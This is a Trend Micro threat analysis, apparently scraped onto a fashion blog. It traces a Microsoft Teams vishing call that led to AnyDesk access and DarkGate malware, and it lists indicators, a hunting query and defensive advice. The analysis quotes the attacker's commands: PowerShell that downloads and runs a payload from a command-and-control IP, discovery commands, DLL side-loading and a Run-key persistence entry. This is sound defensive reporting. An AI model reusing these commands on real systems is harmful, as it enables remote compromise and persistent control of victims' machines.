Close Menu
  • Home
  • Beauty
  • Black Fashion
  • Fashion
  • GenZ
  • Jacket
  • LGBTQ
  • Top Posts
  • Lifestyle
  • Fashion industry
  • Trend

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

What's Hot

Why everyone in Maine is rushing to Auburn for Microblades

April 25, 2025

In urban America, abundant framing can actually be a good thing

April 15, 2025

Want to shine like Paris Hilton? Her beauty routine begins in the body – Celebrity Well

April 14, 2025
Facebook X (Twitter) Instagram
unoluxuryunoluxury
  • Home
  • About Us
  • Advertise with Us
  • Contact us
  • DMCA Policy
  • Privacy Policy
  • Terms and Conditions
  • Home
  • Beauty
  • Black Fashion
  • Fashion
  • GenZ
  • Jacket
  • LGBTQ
  • Top Posts
  • Lifestyle
  • Fashion industry
  • Trend
unoluxuryunoluxury
Home»Trend»Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion
Trend

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion

uno_usr_254By uno_usr_254December 13, 2024No Comments10 Mins Read
Facebook Twitter Pinterest LinkedIn Tumblr Email
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion | Trend Micro (US)

Cyber Threats

In this blog entry, we discuss a social engineering attack that tricked the victim into installing a remote access tool, triggering DarkGate malware activities and an attempted C&C connection.

By: Catherine Loveria, Jovit Samaniego, Gabriel Nicoleta, Aprilyn Borja

December 13, 2024

Read time:  ( words)

Summary

The Trend Micro Managed Detection and Response (MDR) team analyzed an incident wherein an attacker used social engineering via a Microsoft Teams call to impersonate a user’s client and gain remote access to their system.
The attacker failed to install a Microsoft Remote Support application but successfully instructed the victim to download AnyDesk, a tool commonly used for remote access.
After gaining access to the machine, the attacker dropped multiple suspicious files. One of the suspicious files was detected as Trojan.AutoIt.DARKGATE.D.
A series of commands executed by Autoit3.exe led to the connection to a potential command-and-control server and the subsequent download of a malicious payload.
Persistent files and a registry entry were created on the victim’s machine, though the attack was ultimately thwarted before exfiltration occurred.

Using Vision One, we observed a recent security incident in which a user was targeted by an attacker posing as an employee of a known client on a Microsoft Teams call. This led to the user being instructed to download the remote desktop application AnyDesk, which then facilitated the deployment of DarkGate malware. DarkGate, distributed via an AutoIt script, enabled remote control over the user’s machine, executed malicious commands, gathered system information, and connected to a command-and-control server. In this blog entry, we discuss how this breach was carried out in several stages, emphasizing the need for robust security measures and heightened awareness against social engineering attacks. 

Figure 1. Timeline of the attack

Initial access

From this sample case, the attacker used social engineering to manipulate the victim to gain access and control over a computer system. The victim reported that she first received several thousands of emails, after which she received a call via Microsoft Teams from a caller claiming to be an employee of an external supplier. During the call, the victim was instructed to download Microsoft Remote Support application, however, the installation via the Microsoft Store failed. The attacker then instructed the victim to download AnyDesk via browser and manipulate the user to enter her credentials to AnyDesk. Impersonating IT support to potential victims following an email flood is a technique that has been previously disclosed in a Microsoft blog entry.

During the call, the victim was instructed to download a Microsoft Remote Support application; however, the installation via the Microsoft Store failed. The attacker then instructed the victim to download AnyDesk from its official site via browser, and manipulated the user into entering her credentials to AnyDesk. 

Execution

The execution of AnyDesk.exe was observed seconds after downloading the application. The command ran is as follows:

“C:\Users\\Downloads\AnyDesk.exe” –local-service

This command runs the AnyDesk remote desktop application and starts it as a local service on the system, allowing it to operate with elevated privileges or in a minimized/automated fashion.

A few minutes after, cmd.exe was invoked to execute rundll32.exe to load SafeStore.dll, which we assumed were dropped via AnyDesk.exe.

processCmd: “C:\Windows\System32\cmd.exe”
eventSubId: 2 – TELEMETRY_PROCESS_CREATE
objectFilePath: c:\windows\system32\rundll32.exe
objectCmd: rundll32.exe SafeStore.dll,epaas_request_clone

Figure 2. Vision One’s root cause analysis for the SafeStore.dll (SHA256: 1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a)

Vision One’s root cause analysis (RCA) in Figure 4 shows a DLL side-loading technique where rundll32.exe was invoked to execute an exported function in Safestore.dll called epaas_request_clone (Figure 3). There are multiple functions exported by the DLL that can be used to execute the malware (Figure 4).

Figure 3. The exported function epaas_request_clone

Figure 4. Functions exported by the DLL

The execution of Safestore.dll, originally named epaas_client.dll, prompts a login form for entering credentials (Figure 5). 

While the suspicious form was executing, multiple malicious commands were running in the background, even if the user did not enter any credentials. The commands are as follow:

cmd /c systeminfo – provides detailed information about the system’s configuration, including the operating system version, hardware specifications, memory, network adapter details, and system uptime.
cmd /c route print – provided the current network routing table, showing how network traffic is directed to different destinations based on the system’s network configuration.
cmd /c ipconfig /all – provided detailed information about all network interfaces on the system, including IP addresses, subnet masks, gateways, DNS servers, and other network configuration details.  

Saving all the data gathered from the system to 123.txt may be used for system discovery (Figure 6).

DarkGate A3x script

The executable file SystemCert.exe (SHA256: 4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1), which we believed was dropped via AnyDesk.exe, was executed and created script.a3x and Autoit3.exe in the C:\Temp\test\ folder (Figure 7).

Figure 7. Vision One’s root cause analysis for the creation of script.a3x and Autoit3.exe

After the script.a3x and AutoIt3.exe files are created, the malicious script script.a3x is executed via the command cmd c:\temp\test\AutoIt3.exe c:\temp\test\script.a3x.

Figure 8. Content of decompiled script.a3x (SHA256: bb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922), which was detected as Trojan.AutoIt.DARKGATE.D

The encrypted AutoIt payload script.a3x decrypts itself in memory as shellcode and injects itself into remote processes. One observed example was the legitimate binary for MicrosoftEdgeUpdateCore.exe, located in C:\Program Files (x86)\Microsoft\EdgeUpdate. This process is used as a proxy to load and execute the DarkGate script into memory. The execution flow then loads other types of malware into memory to carry out subsequent stages of the attack.

Discovery

Then, the following discovery commands were executed by Autoit3.exe:

processCmd: “c:\temp\test\Autoit3.exe” c:\temp\test\script.a3x
objectCmd: “c:\windows\system32\cmd.exe” /c wmic ComputerSystem get domain > C:\ProgramData\fcdcdfc\kcbbbbc

This command retrieves information about the system’s domain and saves the output to the file kcbbbbc inside the folder C:\ProgramData\fcdcdfc.

Defense evasion

A replicated scenario of this attack shows that Autoit3.exe is looking for multiple well-known antivirus products. 

Figure 9. Replication of the attack where Autoit3.exe was looking for antivirus products

It was also observed that multiple randomly named files were created on different locations as well as copies of Autoit3.exe. This technique is being used to evade detection.

Command and control

Autoit3.exe also executed the script.a3x to inject a process into MicrosoftEdgeUpdateCore.exe, which was then observed connecting to external IP 179.60.149[.]194:80, a C&C server.

processCmd: “c:\temp\test\Autoit3.exe” c:\temp\test\script.a3x
eventSubId: 2 – TELEMETRY_PROCESS_CREATE
objectFilePath: C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.35\MicrosoftEdgeUpdateCore.exe

Figure 10. Vision One’s root cause analysis for the outbound connection to C&C server

A few minutes after the connection to IP 179.60.149[.]194, a VBScript was executed via cscript.exe:

objectCmd:cscript  spamfilter_v1.4331.vbs

Figure 11. Contents of spamfilter_v1.4331.vbs

Based on the contents of VBScript spamfilter_v1.4331.vbs file, it will run the PowerShell command, then run the script.a3x via Autoit3.exe.

Final DarkGate payload

The said event was accompanied by the execution of a PowerShell command that dropped the DarkGate payload:

objectCmd: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri hxxp://179.60.149[.]194:8080/fdgjsdmt)

The command above will attempt to download fdgjsdmt from hxxp://179.60.149[.]194:8080 and execute it with the following content:

objectRawDataStr:ni ‘C:/rbne/dxqu/’ -Type Directory -Force;cd ‘C:/rbne/dxqu/’;Invoke-WebRequest -Uri “hxxp://179.60.149[.]194:8080/dogjaafa” -OutFile ‘file.zip’;Expand-Archive -Path ‘file.zip’ -DestinationPath ‘C:/rbne/dxqu/’;

This command will create a directory at C:\rbne\dxqu\ if it doesn’t already exist. The -Force flag forces the creation even if the directory already exists or if it has hidden or system attributes. It will then attempt to download a file (dogjaafa) and save it as file.zip.

Expand-Archive is a PowerShell cmdlet used to extract the contents of a zip file. This command extracts the contents of the downloaded file.zip into the C:\rbne\dxqu\ directory. The file.zip was dropped to C:\rbne\dxqu\ and contains a malicious AutoIt script.

Figure 12. Vision One’s root cause analysis for file.zip

A few minutes later, an executable file, StaticSrv.exe (SHA256: faa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b), dropped in the C:\Users\\ folder, was executed and invoked AutoIt3.exe to run script.a3x. StaticSrv.exe and SystemCert.exe exhibit the same behavior.

Figure 13. Vision One’s root cause analysis for the execution script.a3x via Autoit3.exe

Post-installation activities

Multiple files and a registry entry were then created for persistence:

C:\ProgramData\fcdcdfc\gdhfdfd\18-11-2024.log (encrypted key logs)
C:\ProgramData\fcdcdfc\kkfafef
C:\Temp\gggahbb
C:\Temp\hbakdef

The following files were also created by Autoit3.exe, including a copy of itself, possibly for backup purposes:

C:\ProgramData\fcdcdfc\Autoit3.exe
C:\ProgramData\fcdcdfc\bbbckdb.a3x
C:\Temp\cdcecgg
C:\Users\\AppData\Roaming\EaDeKFb

Figure 14. Vision One’s root cause analysis for the files created by Autoit3.exe

The registry entry created by MicrosoftEdgeUpdateCore.exe is as follows:

Registry root:2
Registry key:HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Registry value name:ddadcae
Registry value data: “C:\ProgramData\fcdcdfc\Autoit3.exe” C:\ProgramData\fcdcdfc\bbbckdb.a3x
Registry value type:1
Conclusion and security recommendations

In this case we have studied, the attack was prevented before the attacker achieved their objective. There are no activities related to exfiltration found. DarkGate is primarily distributed through phishing emails, malvertising and SEO poisoning. However, in this case, the attacker leveraged voice phishing (vishing) to lure the victim. The vishing technique has also been documented by Microsoft, in a case where the attacker utilized QuickAssist to gain access to its target to distribute ransomware.   

To protect themselves from attacks like that discussed in this blog entry, organizations can apply the following best practices:

Thoroughly vet third-party technical support providers. While legitimate third-party technical support services exist, organizations should ensure that any claims of vendor affiliation are directly verified before granting remote access to corporate systems. Cloud vetting processes should be established to evaluate and approve remote access tools, such as AnyDesk, by assessing their security compliance and the reputation of their vendors.
Whitelist approved remote access tools and block any unverified applications. Organizations should integrate multi-factor authentication (MFA) on remote access tools to add an additional layer of protection by requiring multiple forms of verification before access is granted.  This reduces the risk of malicious tools being used to gain control over internal machines.
Provide employee training to raise awareness about social engineering tactics, phishing attempts, and the dangers of unsolicited support calls or pop-ups.  Well-informed employees are less likely to fall victim to social engineering attacks, strengthening the organization’s overall security posture.

To effectively combat the evolving threat landscape, organizations must prioritize a layered security approach. Solutions like Trend Micro Apex One™ with XDR offer a complete security-as-a-service (SaaS) solution, providing full access to the XDR capabilities in Trend Vision One™ for detecting, responding to, and enhancing the prevention of cyberattacks. Additionally, Trend Micro™ Managed XDR, included in Trend Service One™, plays a crucial role by delivering round-the-clock monitoring, defense, and detection to ensure continuous protection against emerging threats.

Trend Micro Vision One Threat Intelligence

To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.

Trend Micro Vision One Intelligence Reports App [IOC Sweeping]

Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion
Spike in DarkGate Activity – with a new version and new infrastructure
A new DARKGATE campaign was observed

Trend Micro Vision One Threat Insights App

Hunting Queries

Trend Micro Vision One Search App

To hunt for possible malicious activities relating to DarkGate, you may use the query below.  The threat hunting query below detects presence of Autoit3 and script files (.a3x) which are being created and executed.  Note that this can also be triggered by normal activity.

eventSubId: 101 – TELEMETRY_FILE_CREATE
eventSubId: 2 – TELEMETRY_PROCESS_CREATE

eventSubId:101 andeventSubId:2 and (objectCmd:(Autoit3.exe or *.a3x) or processCmd:(Autoit3.exe or *.a3x))

More hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.

Indicators of Compromise (IOCs)

SHA256
Indicator
Detection
1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a 
SafeStore.dll 
Trojan.Win64.DARKGATE.A 
4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1 
SystemCert.exe 
Trojan.Win32.DARKGATE.E 
faa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b 
StaticSrv.exe 
Trojan.Win32.DARKGATE.E 
bb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922 
script.a3x 
Trojan.AutoIt.DARKGATE.D 
e4d13af4bfc3effe4f515c2530b1b182e18ad0c0a3dacac4dd80d6edcf0b007a 
spamfilter_v1.4331.vbs 
Trojan.VBS.DARKGATE.B 

URL/IP
Rating
Category
179.60.149.194
Dangerous
C&C Server
hxxp://179[.]60[.]149[.]194:8080/fdgjsdmt
Dangerous
Malware Accomplice

Tags

sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk



Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleBlack Friday and Cyber ​​Monday Clothes 2024: Top Fashion Trades
Next Article Research predicts how Gen Z will continue to change the workplace in 2025
uno_usr_254
  • Website

Related Posts

Trend

Designers talk about the 8 biggest kitchen trends of 2025

By uno_usr_254November 7, 2024
Trend

Visualize voting trends in 20 years’ worth of U.S. election data

By uno_usr_254November 4, 2024
Trend

Do you really need that student loan? Latest trends in university tuition fees.

By uno_usr_254October 31, 2024
Trend

AI Undermines Democracy and Trends Toward Illiberalism

By uno_usr_254October 31, 2024
Trend

Should a trader cancel a short sale if volume declines?

By uno_usr_254October 31, 2024
Trend

Ripple CTO says he likes this trend in XRP Ledger

By uno_usr_254October 31, 2024
Add A Comment
Leave A Reply Cancel Reply

Don't Miss

Disappeared: US sends Venezuelan LGBTQ asylum seekers to Guantanamo version of El Salvador

By uno_usr_254March 20, 2025

This is a rush transcript. Copying may not be in final form.Amy Goodman: This is…

Russia and Moldova’s “information war” fuels anti-LGBTQ prejudice | All over Russia

October 31, 2024

Russia fuels anti-LGBTQ prejudice in Moldova’s ‘information war’

October 31, 2024

Russia fuels anti-LGBTQ prejudice in Moldova’s ‘information war’

October 31, 2024
Top Posts

Black fashion and accessories designers are taking over

October 30, 2024

Fashion historian Shelby Ivy Christie releases new ABC book celebrating black fashion legends

October 22, 2024

Black fashion brands: Style, innovation, and impact

October 15, 2024

McDonald’s promotes Black fashion designers with NYFW initiative

October 15, 2024

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

About Us
About Us

Welcome to UNO Luxury!

At UNO Luxury, we celebrate fashion, beauty, and diversity. Our mission is to be the ultimate destination for anyone passionate about style and self-expression. Whether you are looking for the latest fashion trends, beauty tips, or insights into the LGBTQ and Black fashion communities, we’ve got you covered.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

These are the 29 best fashion trainers of 2025

March 17, 2025

Black Friday and Cyber ​​Monday Clothes 2024: Top Fashion Trades

December 2, 2024

About Us | Marie Claire

October 27, 2024
Most Popular

LGBTQ people have higher smoking rates and face barriers to quitting

July 18, 2024

The RNC continues to ignore LGBTQ issues

July 19, 2024

Cathedral City’s longtime LGBTQ leather bar The Barracks closes

July 19, 2024
  • Home
  • About Us
  • Advertise with Us
  • Contact us
  • DMCA Policy
  • Privacy Policy
  • Terms and Conditions
© 2025 unoluxury. Designed by unoluxury.

Type above and press Enter to search. Press Esc to cancel.